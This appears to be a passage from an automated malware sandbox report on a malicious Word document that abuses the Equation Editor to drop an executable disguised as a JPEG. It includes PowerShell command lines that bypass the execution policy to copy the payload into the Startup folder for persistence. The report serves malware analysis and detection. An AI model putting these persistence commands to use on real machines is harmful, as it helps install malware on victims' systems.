                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to dropped file
                      Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_003BB2EE NtQuerySystemInformation,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_003BB2CC NtQuerySystemInformation,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_01D6B2EE NtQuerySystemInformation,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_01D6B2CC NtQuerySystemInformation,
                      Source: C:\Users\Public\69577.exeCode function: 4_2_001E9A30
                      Source: C:\Users\Public\69577.exeCode function: 4_2_001EC4F0
                      Source: C:\Users\Public\69577.exeCode function: 4_2_001E29D8
                      Source: C:\Users\Public\69577.exeCode function: 4_2_001E2C6A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_026C1BE2
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0028E0B0
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00286090
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00285478
                      Source: C:\Users\Public\69577.exeCode function: 7_2_002857C0
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0028DB30
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0028C169
                      Source: C:\Users\Public\69577.exeCode function: 7_2_002821E0
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0028F680
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0056DA08
                      Source: C:\Users\Public\69577.exeCode function: 7_2_005656F8
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0056A68A
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00563D48
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00563360
                      Source: C:\Users\Public\69577.exeCode function: 7_2_005671E0
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0056B248
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0056EC38
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00561D08
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0056E730
                      Source: C:\Users\Public\69577.exeCode function: 7_2_0056AF0D
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00568F9D
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_002E9A30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_002EC4F0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_002E159A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_002E29D8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_002E2C6A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0024E0B0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00246090
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00245478
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_002457C0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0024DB30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0024C169
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_002421E0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0024F680
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039DA08
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039A68A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00395480
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00393360
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00393D48
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_003971E0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039EC38
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039B248
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039E730
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_003923D5
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039AF0D
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_0039879D
                      Source: RF_IMG_7510[1].jpg.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Drivers.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: RF_IMG_7510[1].jpg.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Drivers.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: RF_IMG_7510[1].jpg.2.dr, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.0.69577.exe.1050000.0.unpack, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.69577.exe.1050000.3.unpack, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: Drivers.exe.5.dr, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.69577.exe.1050000.4.unpack, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.69577.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.69577.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winDOC@13/15@6/3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_003BACEE AdjustTokenPrivileges,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_003BACB7 AdjustTokenPrivileges,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_01D6ACEE AdjustTokenPrivileges,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_01D6ACB7 AdjustTokenPrivileges,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$_IMG_7510.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC36D.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................D........~......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................D.......0.......................0......./...............f.......X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................P.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.......}.......................0.......;...............".......X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................D...............................0.......G.......................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................D...............................0.......S.......................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................D.......8.......................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................D.......g.......................0......._...............R.......X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................D...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................D...............................0.......k.......................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................D...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .t.r.i.n.g.). .[.C.o.p.y.-.I.t.e.m.].,. .I.O.E.x.c.e.p.t.i.o.n.....w...............D.......X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................o.n.....w.......................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................O.......................o.n.............................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................q.......................o.n.............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .C.o.m.m.a.n.d.............................................o.n.............................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................o.n.............................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................o.n.............................X...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................o.n.............................X...............
                      Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\69577.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: RF_IMG_7510.docReversingLabs: Detection: 25%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Public\69577.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Public\69577.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\Public\69577.exeProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\69577.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: RunPE.pdb source: 69577.exe, 00000004.00000002.2090516277.0000000000270000.00000004.00000001.sdmp, Drivers.exe, 00000008.00000002.2125093142.0000000002281000.00000004.00000001.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098356463.0000000004E70000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 00000008.00000002.2123950202.0000000000B10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2091326557.0000000000CD0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2125712002.0000000003289000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 2368, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2312, type: MEMORY
                      Source: Yara matchFile source: 8.2.Drivers.exe.b10000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.3355d30.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.32ef900.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.35c5d30.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.b10000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.cd0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.cd0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.32ef900.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.3355d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.35c5d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.355f900.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.355f900.7.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\Public\69577.exeCode function: 4_2_010B960F push es; retf
                      Source: C:\Users\Public\69577.exeCode function: 4_2_001E5E8C push ss; iretd
                      Source: C:\Users\Public\69577.exeCode function: 7_2_010B960F push es; retf
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00281B71 pushfd ; iretd
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00281BB8 pushfd ; iretd
                      Source: C:\Users\Public\69577.exeCode function: 7_2_005603C0 push FFFFFFE8h; ret
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_00C4960F push es; retf
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 8_2_002E5E8C push ss; iretd
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00C4960F push es; retf
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_00241BFB pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 11_2_003903BF push FFFFFFE8h; ret
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99096434579
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99096434579
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RF_IMG_7510[1].jpgJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RF_IMG_7510[1].jpgJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the startup folderShow sources
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to dropped file
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
